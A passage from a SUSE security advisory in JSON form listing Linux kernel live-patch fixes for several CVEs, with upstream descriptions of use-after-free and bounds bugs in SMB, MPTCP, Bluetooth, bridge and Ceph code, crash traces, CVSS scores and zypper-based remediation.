"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
